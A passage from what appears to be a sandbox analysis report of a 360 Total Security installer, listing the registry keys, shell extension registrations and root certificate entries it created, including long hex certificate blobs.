| Set value (data) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings = 4600000002000000090000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 | C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\fhxvenN.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable = "0" | C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\fhxvenN.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\CTLs | C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\fhxvenN.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\MenuEx.SD360MN | C:\Windows\system32\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{B09C75BE-F1AE-47BA-BC47-19F5C0A15B33} | C:\Windows\system32\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B69F34DD-F0F9-42DC-9EDD-957187DA688D}\ProgID | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\MenuEx.SD360MN\CurVer | C:\Windows\system32\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{FF9EAEBA-7783-4904-99E3-F3E322C0F648}\1.0\0\win64\ = "C:\\Program Files (x86)\\360\\Total Security\\MenuEx64.dll" | C:\Windows\system32\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{FF9EAEBA-7783-4904-99E3-F3E322C0F648}\1.0\HELPDIR | C:\Windows\system32\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{FF9EAEBA-7783-4904-99E3-F3E322C0F648}\1.0\HELPDIR\ = "C:\\Program Files (x86)\\360\\Total Security" | C:\Windows\system32\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B69F34DD-F0F9-42DC-9EDD-957187DA688D}\VersionIndependentProgID | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B69F34DD-F0F9-42DC-9EDD-957187DA688D}\InprocServer32 | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\shellex\ContextMenuHandlers\SD360 | C:\Windows\system32\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{086F171D-5ED1-4ED2-B736-CFF3AD6A128E}\ProgID\ = "MenuEx.SD360MN.1" | C:\Windows\system32\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{086F171D-5ED1-4ED2-B736-CFF3AD6A128E}\VersionIndependentProgID | C:\Windows\system32\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B69F34DD-F0F9-42DC-9EDD-957187DA688D} | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\shell\Cleanup | C:\Program Files (x86)\1717040751_0\360TS_Setup.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\SD360\ = "{086F171D-5ED1-4ED2-B736-CFF3AD6A128E}" | C:\Windows\system32\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{FF9EAEBA-7783-4904-99E3-F3E322C0F648}\1.0\FLAGS | C:\Windows\system32\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{FF9EAEBA-7783-4904-99E3-F3E322C0F648}\1.0\FLAGS\ = "0" | C:\Windows\system32\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{B09C75BE-F1AE-47BA-BC47-19F5C0A15B33}\TypeLib | C:\Windows\system32\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Safemon.NavigatMon.1\ = "SafeMon Class" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Safemon.NavigatMon\CurVer | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{086F171D-5ED1-4ED2-B736-CFF3AD6A128E} | C:\Windows\system32\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{086F171D-5ED1-4ED2-B736-CFF3AD6A128E}\InprocServer32\ = "C:\\Program Files (x86)\\360\\Total Security\\MenuEx64.dll" | C:\Windows\system32\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{B09C75BE-F1AE-47BA-BC47-19F5C0A15B33}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" | C:\Windows\system32\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{B09C75BE-F1AE-47BA-BC47-19F5C0A15B33}\TypeLib | C:\Windows\system32\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Safemon.NavigatMon\CurVer\ = "Safemon.NavigatMon.1" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B69F34DD-F0F9-42DC-9EDD-957187DA688D}\TypeLib | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B69F34DD-F0F9-42DC-9EDD-957187DA688D}\TypeLib\ = "{BB67E9B5-A1A3-4206-A443-DE93D592682C}" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{FF9EAEBA-7783-4904-99E3-F3E322C0F648}\1.0\ = "MenuEx 1.0 Type Library" | C:\Windows\system32\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{B09C75BE-F1AE-47BA-BC47-19F5C0A15B33}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" | C:\Windows\system32\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{B09C75BE-F1AE-47BA-BC47-19F5C0A15B33}\TypeLib\Version = "1.0" | C:\Windows\system32\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Safemon.NavigatMon.1\CLSID | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Safemon.NavigatMon | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B69F34DD-F0F9-42DC-9EDD-957187DA688D}\ProgID\ = "Safemon.NavigatMon.1" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B69F34DD-F0F9-42DC-9EDD-957187DA688D}\Implemented Categories | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Folder\ShellEx\ContextMenuHandlers\SD360\ = "{086F171D-5ED1-4ED2-B736-CFF3AD6A128E}" | C:\Windows\system32\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\MenuEx.SD360MN.1\CLSID | C:\Windows\system32\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\MenuEx.SD360MN\CLSID\ = "{086F171D-5ED1-4ED2-B736-CFF3AD6A128E}" | C:\Windows\system32\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{FF9EAEBA-7783-4904-99E3-F3E322C0F648}\1.0\0\win64 | C:\Windows\system32\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B69F34DD-F0F9-42DC-9EDD-957187DA688D}\InprocServer32\ThreadingModel = "Apartment" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\shell\Cleanup\command\ = "\"C:\\Program Files (x86)\\360\\Total Security\\QHSafeMain.exe\" /runclean" | C:\Program Files (x86)\1717040751_0\360TS_Setup.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shellex\ContextMenuHandlers\SD360\ = "{086F171D-5ED1-4ED2-B736-CFF3AD6A128E}" | C:\Windows\system32\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\MenuEx.SD360MN.1 | C:\Windows\system32\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\MenuEx.SD360MN.1\CLSID\ = "{086F171D-5ED1-4ED2-B736-CFF3AD6A128E}" | C:\Windows\system32\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{086F171D-5ED1-4ED2-B736-CFF3AD6A128E}\Programmable | C:\Windows\system32\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{B09C75BE-F1AE-47BA-BC47-19F5C0A15B33}\ProxyStubClsid32 | C:\Windows\system32\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Safemon.NavigatMon.1\CLSID\ = "{B69F34DD-F0F9-42DC-9EDD-957187DA688D}" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Safemon.NavigatMon\CLSID\ = "{B69F34DD-F0F9-42DC-9EDD-957187DA688D}" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B69F34DD-F0F9-42DC-9EDD-957187DA688D}\InprocServer32\ = "C:\\Program Files (x86)\\360\\Total Security\\safemon\\safemon.dll" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\MenuEx.SD360MN\ = "SD360MN Class" | C:\Windows\system32\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{086F171D-5ED1-4ED2-B736-CFF3AD6A128E}\ProgID | C:\Windows\system32\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{086F171D-5ED1-4ED2-B736-CFF3AD6A128E}\InprocServer32 | C:\Windows\system32\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{086F171D-5ED1-4ED2-B736-CFF3AD6A128E}\TypeLib | C:\Windows\system32\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{B09C75BE-F1AE-47BA-BC47-19F5C0A15B33}\TypeLib\ = "{FF9EAEBA-7783-4904-99E3-F3E322C0F648}" | C:\Windows\system32\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{FF9EAEBA-7783-4904-99E3-F3E322C0F648}\1.0 | C:\Windows\system32\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{FF9EAEBA-7783-4904-99E3-F3E322C0F648}\1.0\0 | C:\Windows\system32\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B69F34DD-F0F9-42DC-9EDD-957187DA688D}\ = "SafeMon Class" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\MenuEx.SD360MN\CurVer\ = "MenuEx.SD360MN.1" | C:\Windows\system32\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{086F171D-5ED1-4ED2-B736-CFF3AD6A128E}\VersionIndependentProgID\ = "MenuEx.SD360MN" | C:\Windows\system32\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{086F171D-5ED1-4ED2-B736-CFF3AD6A128E}\TypeLib\ = "{FF9EAEBA-7783-4904-99E3-F3E322C0F648}" | C:\Windows\system32\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{B09C75BE-F1AE-47BA-BC47-19F5C0A15B33}\ProxyStubClsid32 | C:\Windows\system32\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{B09C75BE-F1AE-47BA-BC47-19F5C0A15B33}\TypeLib\ = "{FF9EAEBA-7783-4904-99E3-F3E322C0F648}" | C:\Windows\system32\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Safemon.NavigatMon\ = "SafeMon Class" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\shell\Cleanup\Icon = "\"C:\\Program Files (x86)\\360\\Total Security\\QHSafeMain.exe\",0" | C:\Program Files (x86)\1717040751_0\360TS_Setup.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\shellex\ContextMenuHandlers\SD360\ = "{086F171D-5ED1-4ED2-B736-CFF3AD6A128E}" | C:\Windows\system32\regsvr32.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\C18211328A92B3B23809B9B5E2740A07FB12EB5E\Blob = 0f0000000100000014000000b9a47bc85ee7b2139533ad60cfa5c1e9bd00170b030000000100000014000000c18211328a92b3b23809b9b5e2740a07fb12eb5e090000000100000016000000301406082b0601050507030106082b060105050703020b000000010000001800000045002d0043006500720074006300680069006c006500000020000000010000000d08000030820809308205f1a003020102021067d6b6ddd44b1eaa4bec947872359766300d06092a864886f70d01010505003081b1310b300906035504061302434c311d301b06035504081314526567696f6e204d6574726f706f6c6974616e613111300f0603550407130853616e746961676f31143012060355040a130b452d434552544348494c453120301e060355040b13174175746f726964616420436572746966696361646f7261311f301d06092a864886f70d010901161073636c69656e746573406363732e636c311730150603550403130e452d4345525420524f4f54204341301e170d3038303930353139333430385a170d3238303930353139333934315a3081b1310b300906035504061302434c311d301b06035504081314526567696f6e204d6574726f706f6c6974616e613111300f0603550407130853616e746961676f31143012060355040a130b452d434552544348494c453120301e060355040b13174175746f726964616420436572746966696361646f7261311f301d06092a864886f70d010901161073636c69656e746573406363732e636c311730150603550403130e452d4345525420524f4f5420434130820222300d06092a864886f70d01010105000382020f003082020a0282020100a4808725db9552ec183f3e212f94819da7231ac36a4e465e9ad8277ff4a4f118b0bd944cd48afb448845c45e27997e636a84125471d7593bb8a8124eb1a72de0e27c4714cdb570b46294c762a3fb6d953a665cea7eca8cfeea1f63f5c95beb409d84d833a8dd81ac7efbe8b899bb927964ff0a6f83378dde2bad0f0dbbe7c361fdb04ab31ae010e61d150c375d8bdfbc3d2bf2ed8a01a4404bfd426819146334355bc5446bcc50989c9eed6bddeb07433b1d6c0b047fcee2bc62bad33ecb4b14226c3bb456f4ba27db21450fbe16959254b5f1f917a7e7ed87c19dd692b7ac618d177650761e5133ce6f7e242b8e146fcd7cc4ad63709ed2ceee3c57c61a9440055d638e25d79163e2c6625a1fd0ecf7d4df0f4d56cd5ac58d27aa76838e661a1c95e3f982969ea213544dd6d6520eec438641ff54469e9435a46010b604cb98d9f67c7debb3a103e9d8b942df6f60266e47f08913e5812c07fbfd56d8fbd869ee3e87a9f98cf2f295d17cc88a9dc3c4c134d323e50b38ac7216dac3f4e6729b949b2d3f53b75db1dc6410238939c6c78e857b7f7c34988536f1bac7898722e2f23ea9e01de72b3063ac7455f7e032c9e32e6e8915be2c51d8100a78a9cf3a0d37e982920a9587e7033c4e7bdbe8e6720808d9ff9d3bd9a3f7f2f215109d394ef72e7325cbedbf5330d57fff19f7175d542a364856cf35eb74acd4a2c6ba38510203010001a382021930820215300e0603551d0f0101ff040403020106301306092b060104018237140204061e0400430041300f0603551d130101ff040530030101ff301d0603551d0e0416041450dd82d188922d8f3ce9ba5dc76266e26f7bab20308201130603551d1f0482010a3082010630820102a081ffa081fc8681ba6c6461703a2f2f2f434e3d452d43455254253230524f4f5425323043412c434e3d706b692d726f6f742c434e3d4344502c434e3d5075626c69632532304b657925323053657276696365732c434e3d53657276696365732c434e3d436f6e66696775726174696f6e2c44433d6563657274706b692c44433d636c3f63657274696669636174655265766f636174696f6e4c6973743f626173653f6f626a656374436c6173733d63524c446973747269627574696f6e506f696e74863d687474703a2f2f706b692d726f6f742e6563657274706b692e636c2f43657274456e726f6c6c2f452d43455254253230524f4f5425323043412e63726c301006092b0601040182371501040302010030620603551d20045b3059305706082b06010401c35205304b304906082b06010505070201163d687474703a2f2f7777772e652d636572746368696c652e636c2f68746d6c2f70726f647563746f732f646f776e6c6f61642f43505376312e372e70646630310603551d25042a302806082b0601050507030106082b0601050507030206082b0601050507030406082b06010505070308300d06092a864886f70d010105050003820201007583953f21ed74792ededb1e76f221c2db9660be9bb0c54e0b572e4928a2b6c3a62e50048b004ca9b37285a4e6746f426fd29bd43ff8d4e8316b573e81cbb186ceb07ed9d8e3edeee004d77470ad551731b1bc1405579952a2e77bc3eedb4ab3b3faeca743b4c213565f0a32d10d5855e0303f640704aacf6f0b29afed891d1cc0e695031981b7b170ece17a7d383a53c5dcd2b9ea8229f14dae5dd9e8c59da84624690b6a29291aa9cd2fdce2e98319e27369ebeaf2d6d76816195eca62eb4a0b8f0456f5ee955d1211e30d50a0cdf4eb617ea820a2c4523731e7a6853063dfb64a298e5888cfb57558685c9bd23f1286aca6938d8793f73118a957d2ce37a517455f673e82dbe53a6f0a989206bf605d3a84a445124350401c569425fda7520a6c2dc4e8a0cd7142e4350ba85189a4f98708f81d08faae0e9d02bd2d7f596e1d0182a3897063b461ae63243574204dc0d71872e9ac2caf9951836ea37b17d8fc7215f3c711c44b41b472c470ff585121a1e12b6365e57490a26dc2ff917dad4f07372518aa9f9c2d1c28764edf82aece426e06923cbb877171a1ee341fec0d0e17f5a7f85afa66e47de7d1e882316547bb729f5495e4479a204cfaf81a45c968cb44986eec992d105dcbd8ecfb0a5449a58f30d3df8613d0543fee24b3a127fc20ef78e391b9d896f244ba6e5f8909ca7a274efbf98cacc117b75889ff763e | C:\Program Files (x86)\1717040751_0\360TS_Setup.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B38FECEC0B148AA686C3D00F01ECC8848E8085EB | C:\Program Files (x86)\1717040751_0\360TS_Setup.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\7E04DE896A3E666D00E687D33FFAD93BE83D349E\Blob = 190000000100000010000000b009e99a5cfc928a173190106dbb32a90f000000010000003000000082c80199397722b57ad473ea266b93d47ffc77fe07f09388345f20dab6addd087672f988b4bbfd154c4b133c70c9ecff0300000001000000140000007e04de896a3e666d00e687d33ffad93be83d349e090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080b000000010000003000000044006900670069004300650072007400200047006c006f00620061006c00200052006f006f00740020004700330000005300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0140000000100000014000000b3db48a4f9a1c5d8ae3641cc1163696229bc4bc62000000001000000430200003082023f308201c5a0030201020210055556bcf25ea43535c3a40fd5ab4572300a06082a8648ce3d0403033061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204733301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f742047333076301006072a8648ce3d020106052b8104002203620004dda7d9bb8ab80bfb0b7f21d2f0bebe73f3335d1abc34eadec69bbcd095f6f0ccd00bba615b51467e9e2d9fee8e630c17ec0770f5cf842e40839ce83f416d3badd3a4145936789d0343ee10136c72deae88a7a16bb543ce67dc23ff031ca3e23ea3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e04160414b3db48a4f9a1c5d8ae3641cc1163696229bc4bc6300a06082a8648ce3d0403030368003065023100adbcf26c3f124ad12d39c30a099773f488368c8827bbe6888d5085a763f99e32de66930ff1ccb1098fdd6cabfa6b7fa0023039665bc2648db89e50dca8d549a2edc7dcd1497f1701b8c8868f4e8c882ba89aa98ac5d100bdf854e29ae55b7cb32717 | C:\Program Files (x86)\1717040751_0\360TS_Setup.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\968338F113E36A7BABDD08F7776391A68736582E | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\updroots.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\18F7C1FCC3090203FD5BAA2F861A754976C8DD25\Blob = 0b000000010000003400000056006500720069005300690067006e002000540069006d00650020005300740061006d00700069006e006700200043004100000009000000010000000c000000300a06082b0601050507030803000000010000001400000018f7c1fcc3090203fd5baa2f861a754976c8dd252000000001000000c0020000308202bc3082022502104a19d2388c82591ca55d735f155ddca3300d06092a864886f70d010104050030819e311f301d060355040a1316566572695369676e205472757374204e6574776f726b31173015060355040b130e566572695369676e2c20496e632e312c302a060355040b1323566572695369676e2054696d65205374616d70696e67205365727669636520526f6f7431343032060355040b132b4e4f204c494142494c4954592041434345505445442c20286329393720566572695369676e2c20496e632e301e170d3937303531323030303030305a170d3034303130373233353935395a30819e311f301d060355040a1316566572695369676e205472757374204e6574776f726b31173015060355040b130e566572695369676e2c20496e632e312c302a060355040b1323566572695369676e2054696d65205374616d70696e67205365727669636520526f6f7431343032060355040b132b4e4f204c494142494c4954592041434345505445442c20286329393720566572695369676e2c20496e632e30819f300d06092a864886f70d010101050003818d0030818902818100d32e20f0687c2c2d2e811cb106b2a70bb7110d57da53d875e3c9332ab2d4f6095b34f3e990fe090cd0db1b5ab9cde7f688b19dc08725eb7d5810736a78cb7115fdc658f629ab585e9604fd2d621158811cca7194d522582fd5cc14058436ba94aab44d4ae9ee3b22ad56997e219c6c86c04a47976ab4a636d5fc092dd3b4399b0203010001300d06092a864886f70d01010405000381810061550e3e7bc792127e11108e22ccd4b3132b5be844e40b789ea47ef3a707721ee259efcc84e389944cdb4e61efb3a4fb463d50340b9f7056f68e2a7f17cee563bf796907732eb095288af5edaaa9d25dcd0aca10098fceb3af2896c479298492dcffba674248a69010e4bf61f89c53e593d1733ff8fd9d4f84ac55d1fd116363 | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\updroots.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\E70715F6F728365B5190E271DEE4C65EBEEACAF3 | C:\Program Files (x86)\1717040751_0\360TS_Setup.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\4F65566336DB6598581D584A596C87934D5F2AB4 | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\updroots.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\093C61F38B8BDC7D55DF7538020500E125F5C836 | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\updroots.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B172B1A56D95F91FE50287E14D37EA6A4463768A\Blob = 1400000001000000140000008982677dc49d2670004bb450487cde3dae046e7d030000000100000014000000b172b1a56d95f91fe50287e14d37ea6a4463768a090000000100000016000000301406082b0601050507030406082b060105050703020b000000010000001400000055005300450052005400720075007300740000000f0000000100000014000000bba770661f7c955307ec67e2369d3c3991e21fdc2000000001000000a6040000308204a23082038aa003020102021044be0c8b500024b411d336252567c989300d06092a864886f70d01010505003081ae310b3009060355040613025553310b3009060355040813025554311730150603550407130e53616c74204c616b652043697479311e301c060355040a131554686520555345525452555354204e6574776f726b3121301f060355040b1318687474703a2f2f7777772e7573657274727573742e636f6d313630340603550403132d55544e2d5553455246697273742d436c69656e742041757468656e7469636174696f6e20616e6420456d61696c301e170d3939303730393137323835305a170d3139303730393137333635385a3081ae310b3009060355040613025553310b3009060355040813025554311730150603550407130e53616c74204c616b652043697479311e301c060355040a131554686520555345525452555354204e6574776f726b3121301f060355040b1318687474703a2f2f7777772e7573657274727573742e636f6d313630340603550403132d55544e2d5553455246697273742d436c69656e742041757468656e7469636174696f6e20616e6420456d61696c30820122300d06092a864886f70d01010105000382010f003082010a0282010100b23985a4f27dab413b624637aecdc16075bc3965f94a1a47a2b9cc48cc6a98d54d3519b9a442e5ce49e28a2f1e7cd23107c74eb483649d2e29d5a264c485bd85513579a44e68907b1c7aa492a817f29815f293ccc9a43295bb0c4f30bd98a00b8be56e1ba246fa78bca26fab595ea52fcfcada6daa2febaca1b36aaab72e67358b79e11e6988e2e646cda0a5eabe0bce763a7a0e9beafcda275b3d731f22e64861c64cf369b1a82e1bb6d431202cbc828a8ea40ea5d78943fc165aaf1d71d71159daba870daffaf3e1c2f0a4c5678cd6d6543ade0aa4ba0377b365c8fd1ed37462aa18ca68931ea1857ef54765cbf84d572874d234ff30b6eef66230148c2ceb0203010001a381b93081b6300b0603551d0f0404030201c6300f0603551d130101ff040530030101ff301d0603551d0e041604148982677dc49d2670004bb450487cde3dae046e7d30580603551d1f0451304f304da04ba0498647687474703a2f2f63726c2e7573657274727573742e636f6d2f55544e2d5553455246697273742d436c69656e7441757468656e7469636174696f6e616e64456d61696c2e63726c301d0603551d250416301406082b0601050507030206082b06010505070304300d06092a864886f70d01010505000382010100b16d615da61a7f7cab4ae430fc536f2524c6caede2315c2b0eeeee61556f043ecf39dec51b4994e4eb204cb4e69e502e72d98df5aaa3b34ada561c609780dc82a2ad4abd8a2bff0b09b4c6d7200445e4cd8001baba2b6eceaad792fee4afebf4261d162a7f6c3095372f3312ac7fddc7d1118c5198b2d0a391d0adf69f9e83931e1d42b846af6b66f09b7feae30302e50251c1aad5359d72400389ba311dc51068529edfa285c55c08a678e6534fb1e8b7d3149e93a6c364e3ac7e71cdbc9fe9031bccfbe9ac31c1af7c15740299c3b247a6c23261d7c76f48245127a1d58755f27b8f983d169eee75b6f8d08ef2f3c6ae285ba7f0f33617fcc305d3ca034a54 | C:\Program Files (x86)\1717040751_0\360TS_Setup.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\3DB66DFEBEB6712889E7C098B32805896B6218CC\Blob = 0f0000000100000014000000ed46c3e70d171ca459f19e407c06e711afc4a74e0300000001000000140000003db66dfebeb6712889e7c098b32805896b6218cc090000000100000020000000301e06082b0601050507030106082b0601050507030206082b060105050703040b000000010000001e00000043004100200044004100540045005600200042005400200030003300000020000000010000000804000030820404308202eca0030201020210726e2de92113d03eb81da72f1102a999300d06092a864886f70d01010505003039310b30090603550406130244453111300f060355040a0c0844415445562065473117301506035504030c0e4341204441544556204254203033301e170d3134303530323035343035395a170d3232303830323037343035395a3039310b30090603550406130244453111300f060355040a0c0844415445562065473117301506035504030c0e434120444154455620425420303330820122300d06092a864886f70d01010105000382010f003082010a0282010100df26feee85a0913020037a0ab474485298260fe24b1f6e3f6d740d3718837ecf1c74c6c8dd5b2e218781bbea93e98cfd26787004dfb7a4de85f45d2113d845dd3b30972968ae27ef523a3a5d6583e22965da2fc5c5485cf6ff5488b52b624895a4a338b240d2e5941323282d0a1fcadd29ab671af3cd17dfa6b9461e1b66472a7fba4ddb2dc42e09c4a492a95d1ee23e547590f879bfb056cd4991b3cf991c30105c8d4e164b6fcd9eb6682e808502bb5799952e7ed5ca299b10db501c0be276326010acb819f0a79eb530ebfcb70f4e6ca2e091d7b0dba781caa89e3dc5bfeaaea922cbe787dc31c4180792e97ef60fd860cfaae80577770bcdf1bae6aa419d0203010001a382010630820102300e0603551d0f0101ff04040302010630700603551d23046930678014f4b4be6f7c128d15768738d97f4d7c87c229f9c3a13da43b3039310b30090603550406130244453111300f060355040a0c0844415445562065473117301506035504030c0e4341204441